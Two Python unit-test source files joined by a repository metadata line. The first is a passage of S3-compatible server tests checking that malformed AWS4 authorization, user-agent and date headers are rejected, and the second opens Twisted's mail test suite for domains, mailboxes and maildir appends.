@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_mismatch_below_aws4():
check_aws4_support()
content = 'bar'
length = len(content) - 1
key = _setup_bad_object({'Content-Length': length})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, content)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'XAmzContentSHA256Mismatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/incorrect authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_authorization_incorrect_aws4():
check_aws4_support()
key = _setup_bad_object({'Authorization': 'AWS4-HMAC-SHA256 Credential=AKIAIGR7ZNNBHC5BKSUB/20150930/us-east-1/s3/aws4_request,SignedHeaders=host;user-agent,Signature=FWeDfwojDSdS2Ztmpfeubhd9isU='})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch', 'InvalidAccessKeyId')
@tag('auth_aws4')
@nose.with_setup(teardown=_clear_custom_headers)
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid authorization')
@attr(assertion='fails 400')
def test_object_create_bad_authorization_invalid_aws4():
check_aws4_support()
key = _setup_bad_object({'Authorization': 'AWS4-HMAC-SHA256 Credential=HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
assert e.error_code in ('AuthorizationHeaderMalformed', 'InvalidArgument')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty user agent')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_empty_aws4():
check_aws4_support()
key = _setup_bad_object({'User-Agent': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic user agent')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_unreadable_aws4():
check_aws4_support()
key = _setup_bad_object({'User-Agent': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no user agent')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_none_aws4():
check_aws4_support()
key = _setup_bad_object(remove=('User-Agent',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_invalid_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Bad Date'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_invalid_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': 'Bad Date'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_empty_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': ''})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_empty_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_unreadable_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic x-amz-date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_unreadable_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_none_aws4():
check_aws4_support()
key = _setup_bad_object(remove=('Date',))
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_none_aws4():
check_aws4_support()
key = _setup_bad_object(remove=('X-Amz-Date',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date in past')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_before_today_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 2010 21:53:04 GMT'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/x-amz-date in past')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_before_today_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '20100707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date in future')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_after_today_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 2030 21:53:04 GMT'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/x-amz-date in future')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_after_today_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '20300707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date before epoch')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_before_epoch_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 1950 21:53:04 GMT'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/x-amz-date before epoch')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_before_epoch_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '19500707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date after 9999')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_after_end_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 9999 21:53:04 GMT'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/x-amz-date after 9999')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_after_end_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '99990707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create with missing signed custom header')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_missing_signed_custom_header_aws4():
check_aws4_support()
method='PUT'
expires_in='100000'
bucket = get_new_bucket()
key = bucket.new_key('foo')
body='zoo'
# compute the signature with 'x-amz-foo=bar' in the headers...
request_headers = {'x-amz-foo':'bar'}
url = key.generate_url(expires_in, method=method, headers=request_headers)
o = urlparse(url)
path = o.path + '?' + o.query
# avoid sending 'x-amz-foo=bar' in the headers
request_headers.pop('x-amz-foo')
res =_make_raw_request(host=s3.main.host, port=s3.main.port, method=method, path=path,
body=body, request_headers=request_headers, secure=s3.main.is_secure)
eq(res.status, 403)
eq(res.reason, 'Forbidden')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(opearation='create with missing signed header')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_missing_signed_header_aws4():
check_aws4_support()
method='PUT'
expires_in='100000'
bucket = get_new_bucket()
key = bucket.new_key('foo')
body='zoo'
# compute the signature...
request_headers = {}
url = key.generate_url(expires_in, method=method, headers=request_headers)
o = urlparse(url)
path = o.path + '?' + o.query
# 'X-Amz-Expires' is missing
target = r'&X-Amz-Expires=' + expires_in
path = re.sub(target, '', path)
res =_make_raw_request(host=s3.main.host, port=s3.main.port, method=method, path=path,
body=body, request_headers=request_headers, secure=s3.main.is_secure)
eq(res.status, 403)
eq(res.reason, 'Forbidden')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid authorization')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_authorization_invalid_aws4():
check_aws4_support()
_add_custom_headers({'Authorization': 'AWS4 HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidArgument')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty user agent')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_empty_aws4():
check_aws4_support()
_add_custom_headers({'User-Agent': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic user agent')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_unreadable_aws4():
check_aws4_support()
_add_custom_headers({'User-Agent': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no user agent')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_none_aws4():
check_aws4_support()
_add_custom_headers(remove=('User-Agent',))
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_invalid_aws4():
check_aws4_support()
_add_custom_headers({'Date': 'Bad Date'})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_invalid_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': 'Bad Date'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_empty_aws4():
check_aws4_support()
_add_custom_headers({'Date': ''})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_empty_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_unreadable_aws4():
check_aws4_support()
_add_custom_headers({'Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic x-amz-date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_unreadable_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_none_aws4():
check_aws4_support()
_add_custom_headers(remove=('Date',))
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_none_aws4():
check_aws4_support()
_add_custom_headers(remove=('X-Amz-Date',))
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date in past')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_before_today_aws4():
check_aws4_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 2010 21:53:04 GMT'})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/x-amz-date in past')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_before_today_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': '20100707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date in future')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_after_today_aws4():
check_aws4_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 2030 21:53:04 GMT'})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/x-amz-date in future')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_after_today_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': '20300707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date before epoch')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_before_epoch_aws4():
check_aws4_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 1950 21:53:04 GMT'})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/x-amz-date before epoch')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_before_epoch_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': '19500707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
|
candy7393/VTK
|
refs/heads/master
|
ThirdParty/Twisted/twisted/mail/test/test_mail.py
|
26
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for large portions of L{twisted.mail}.
"""
import os
import errno
import shutil
import pickle
import StringIO
import rfc822
import tempfile
import signal
from hashlib import md5
from zope.interface.verify import verifyClass
from zope.interface import Interface, implements
from twisted.trial import unittest
from twisted.mail import smtp
from twisted.mail import pop3
from twisted.names import dns
from twisted.internet import protocol
from twisted.internet import defer
from twisted.internet.defer import Deferred
from twisted.internet import reactor
from twisted.internet import interfaces
from twisted.internet import task
from twisted.internet.error import DNSLookupError, CannotListenError
from twisted.internet.error import ProcessDone, ProcessTerminated
from twisted.internet import address
from twisted.python import failure
from twisted.python.filepath import FilePath
from twisted import mail
import twisted.mail.mail
import twisted.mail.maildir
import twisted.mail.relay
import twisted.mail.relaymanager
import twisted.mail.protocols
import twisted.mail.alias
from twisted.names.error import DNSNameError
from twisted.names.dns import RRHeader, Record_CNAME, Record_MX
from twisted import cred
import twisted.cred.credentials
import twisted.cred.checkers
import twisted.cred.portal
from twisted.test.proto_helpers import LineSendingProtocol
class DomainWithDefaultsTestCase(unittest.TestCase):
def testMethods(self):
d = dict([(x, x + 10) for x in range(10)])
d = mail.mail.DomainWithDefaultDict(d, 'Default')
self.assertEqual(len(d), 10)
self.assertEqual(list(iter(d)), range(10))
self.assertEqual(list(d.iterkeys()), list(iter(d)))
items = list(d.iteritems())
items.sort()
self.assertEqual(items, [(x, x + 10) for x in range(10)])
values = list(d.itervalues())
values.sort()
self.assertEqual(values, range(10, 20))
items = d.items()
items.sort()
self.assertEqual(items, [(x, x + 10) for x in range(10)])
values = d.values()
values.sort()
self.assertEqual(values, range(10, 20))
for x in range(10):
self.assertEqual(d[x], x + 10)
self.assertEqual(d.get(x), x + 10)
self.failUnless(x in d)
self.failUnless(d.has_key(x))
del d[2], d[4], d[6]
self.assertEqual(len(d), 7)
self.assertEqual(d[2], 'Default')
self.assertEqual(d[4], 'Default')
self.assertEqual(d[6], 'Default')
d.update({'a': None, 'b': (), 'c': '*'})
self.assertEqual(len(d), 10)
self.assertEqual(d['a'], None)
self.assertEqual(d['b'], ())
self.assertEqual(d['c'], '*')
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(d.setdefault('key', 'value'), 'value')
self.assertEqual(d['key'], 'value')
self.assertEqual(d.popitem(), ('key', 'value'))
self.assertEqual(len(d), 0)
dcopy = d.copy()
self.assertEqual(d.domains, dcopy.domains)
self.assertEqual(d.default, dcopy.default)
def _stringificationTest(self, stringifier):
"""
Assert that the class name of a L{mail.mail.DomainWithDefaultDict}
instance and the string-formatted underlying domain dictionary both
appear in the string produced by the given string-returning function.
@type stringifier: one-argument callable
@param stringifier: either C{str} or C{repr}, to be used to get a
string to make assertions against.
"""
domain = mail.mail.DomainWithDefaultDict({}, 'Default')
self.assertIn(domain.__class__.__name__, stringifier(domain))
domain['key'] = 'value'
self.assertIn(str({'key': 'value'}), stringifier(domain))
def test_str(self):
"""
L{DomainWithDefaultDict.__str__} should return a string including
the class name and the domain mapping held by the instance.
"""
self._stringificationTest(str)
def test_repr(self):
"""
L{DomainWithDefaultDict.__repr__} should return a string including
the class name and the domain mapping held by the instance.
"""
self._stringificationTest(repr)
class BounceTestCase(unittest.TestCase):
def setUp(self):
self.domain = mail.mail.BounceDomain()
def testExists(self):
self.assertRaises(smtp.AddressError, self.domain.exists, "any user")
def testRelay(self):
self.assertEqual(
self.domain.willRelay("random q emailer", "protocol"),
False
)
def testAddUser(self):
self.domain.addUser("bob", "password")
self.assertRaises(smtp.SMTPBadRcpt, self.domain.exists, "bob")
class FileMessageTestCase(unittest.TestCase):
def setUp(self):
self.name = "fileMessage.testFile"
self.final = "final.fileMessage.testFile"
self.f = file(self.name, 'w')
self.fp = mail.mail.FileMessage(self.f, self.name, self.final)
def tearDown(self):
try:
self.f.close()
except:
pass
try:
os.remove(self.name)
except:
pass
try:
os.remove(self.final)
except:
pass
def testFinalName(self):
return self.fp.eomReceived().addCallback(self._cbFinalName)
def _cbFinalName(self, result):
self.assertEqual(result, self.final)
self.failUnless(self.f.closed)
self.failIf(os.path.exists(self.name))
def testContents(self):
contents = "first line\nsecond line\nthird line\n"
for line in contents.splitlines():
self.fp.lineReceived(line)
self.fp.eomReceived()
self.assertEqual(file(self.final).read(), contents)
def testInterrupted(self):
contents = "first line\nsecond line\n"
for line in contents.splitlines():
self.fp.lineReceived(line)
self.fp.connectionLost()
self.failIf(os.path.exists(self.name))
self.failIf(os.path.exists(self.final))
class MailServiceTestCase(unittest.TestCase):
def setUp(self):
self.service = mail.mail.MailService()
def testFactories(self):
f = self.service.getPOP3Factory()
self.failUnless(isinstance(f, protocol.ServerFactory))
self.failUnless(f.buildProtocol(('127.0.0.1', 12345)), pop3.POP3)
f = self.service.getSMTPFactory()
self.failUnless(isinstance(f, protocol.ServerFactory))
self.failUnless(f.buildProtocol(('127.0.0.1', 12345)), smtp.SMTP)
f = self.service.getESMTPFactory()
self.failUnless(isinstance(f, protocol.ServerFactory))
self.failUnless(f.buildProtocol(('127.0.0.1', 12345)), smtp.ESMTP)
def testPortals(self):
o1 = object()
o2 = object()
self.service.portals['domain'] = o1
self.service.portals[''] = o2
self.failUnless(self.service.lookupPortal('domain') is o1)
self.failUnless(self.service.defaultPortal() is o2)
class StringListMailboxTests(unittest.TestCase):
"""
Tests for L{StringListMailbox}, an in-memory only implementation of
L{pop3.IMailbox}.
"""
def test_listOneMessage(self):
"""
L{StringListMailbox.listMessages} returns the length of the message at
the offset into the mailbox passed to it.
"""
mailbox = mail.maildir.StringListMailbox(["abc", "ab", "a"])
self.assertEqual(mailbox.listMessages(0), 3)
self.assertEqual(mailbox.listMessages(1), 2)
self.assertEqual(mailbox.listMessages(2), 1)
def test_listAllMessages(self):
"""
L{StringListMailbox.listMessages} returns a list of the lengths of all
messages if not passed an index.
"""
mailbox = mail.maildir.StringListMailbox(["a", "abc", "ab"])
self.assertEqual(mailbox.listMessages(), [1, 3, 2])
def test_getMessage(self):
"""
L{StringListMailbox.getMessage} returns a file-like object from which
the contents of the message at the given offset into the mailbox can be
read.
"""
mailbox = mail.maildir.StringListMailbox(["foo", "real contents"])
self.assertEqual(mailbox.getMessage(1).read(), "real contents")
def test_getUidl(self):
"""
L{StringListMailbox.getUidl} returns a unique identifier for the
message at the given offset into the mailbox.
"""
mailbox = mail.maildir.StringListMailbox(["foo", "bar"])
self.assertNotEqual(mailbox.getUidl(0), mailbox.getUidl(1))
def test_deleteMessage(self):
"""
L{StringListMailbox.deleteMessage} marks a message for deletion causing
further requests for its length to return 0.
"""
mailbox = mail.maildir.StringListMailbox(["foo"])
mailbox.deleteMessage(0)
self.assertEqual(mailbox.listMessages(0), 0)
self.assertEqual(mailbox.listMessages(), [0])
def test_undeleteMessages(self):
"""
L{StringListMailbox.undeleteMessages} causes any messages marked for
deletion to be returned to their original state.
"""
mailbox = mail.maildir.StringListMailbox(["foo"])
mailbox.deleteMessage(0)
mailbox.undeleteMessages()
self.assertEqual(mailbox.listMessages(0), 3)
self.assertEqual(mailbox.listMessages(), [3])
def test_sync(self):
"""
L{StringListMailbox.sync} causes any messages as marked for deletion to
be permanently deleted.
"""
mailbox = mail.maildir.StringListMailbox(["foo"])
mailbox.deleteMessage(0)
mailbox.sync()
mailbox.undeleteMessages()
self.assertEqual(mailbox.listMessages(0), 0)
self.assertEqual(mailbox.listMessages(), [0])
class FailingMaildirMailboxAppendMessageTask(mail.maildir._MaildirMailboxAppendMessageTask):
_openstate = True
_writestate = True
_renamestate = True
def osopen(self, fn, attr, mode):
if self._openstate:
return os.open(fn, attr, mode)
else:
raise OSError(errno.EPERM, "Faked Permission Problem")
def oswrite(self, fh, data):
if self._writestate:
return os.write(fh, data)
else:
raise OSError(errno.ENOSPC, "Faked Space problem")
def osrename(self, oldname, newname):
if self._renamestate:
return os.rename(oldname, newname)
else:
raise OSError(errno.EPERM, "Faked Permission Problem")
class _AppendTestMixin(object):
"""
Mixin for L{MaildirMailbox.appendMessage} test cases which defines a helper
for serially appending multiple messages to a mailbox.
"""
def _appendMessages(self, mbox, messages):
"""
Deliver the given messages one at a time. Delivery is serialized to
guarantee a predictable order in the mailbox (overlapped message deliver
makes no guarantees about which message which appear first).
"""
results = []
def append():
for m in messages:
d = mbox.appendMessage(m)
d.addCallback(results.append)
yield d
d = task.cooperate(append()).whenDone()
d.addCallback(lambda ignored: results)
return d
class MaildirAppendStringTestCase(unittest.TestCase, _AppendTestMixin):
"""
Tests for L{MaildirMailbox.appendMessage} when invoked with a C{str}.
"""
def setUp(self):
self.d = self.mktemp()
mail.maildir.initializeMaildir(self.d)
def _append(self, ignored, mbox):
d = mbox.appendMessage('TEST')
return self.assertFailure(d, Exception)
def _setState(self, ignored, mbox, rename=None, write=None, open=None):
"""
Change the behavior of future C{rename}, C{write}, or C{open} calls made
by the mailbox C{mbox}.
@param rename: If not C{None}, a new value for the C{_renamestate}
attribute of the mailbox's append factory. The original value will
be restored at the end of the test.
@param write: Like C{rename}, but for the C{_writestate} attribute.
@param open: Like C{rename}, but for the C{_openstate} attribute.
"""
if rename is not None:
self.addCleanup(
setattr, mbox.AppendFactory, '_renamestate',
mbox.AppendFactory._renamestate)
mbox.AppendFactory._renamestate = rename
if write is not None:
self.addCleanup(
setattr, mbox.AppendFactory, '_writestate',
mbox.AppendFactory._writestate)
mbox.AppendFactory._writestate = write
if open is not None:
self.addCleanup(
setattr, mbox.AppendFactory, '_openstate',
mbox.AppendFactory._openstate)
mbox.AppendFactory._openstate = open
def test_append(self):
"""
L{MaildirMailbox.appendMessage} returns a L{Deferred} which fires when
the message has been added to the end of the mailbox.
"""
mbox = mail.maildir.MaildirMailbox(self.d)
mbox.AppendFactory = FailingMaildirMailboxAppendMessageTask
d = self._appendMessages(mbox, ["X" * i for i in range(1, 11)])
d.addCallback(self.assertEqual, [None] * 10)
d.addCallback(self._cbTestAppend, mbox)
return d
def _cbTestAppend(self, ignored, mbox):
"""
Check that the mailbox has the expected number (ten) of messages in it,
and that each has the expected contents, and that they are in the same
order as that in which they were appended.
"""
self.assertEqual(len(mbox.listMessages()), 10)
self.assertEqual(
[len(mbox.getMessage(i).read()) for i in range(10)],
range(1, 11))
# test in the right order: last to first error location.
self._setState(None, mbox, rename=False)
d = self._append(None, mbox)
d.addCallback(self._setState, mbox, rename=True, write=False)
d.addCallback(self._append, mbox)
d.addCallback(self._setState, mbox, write=True, open=False)
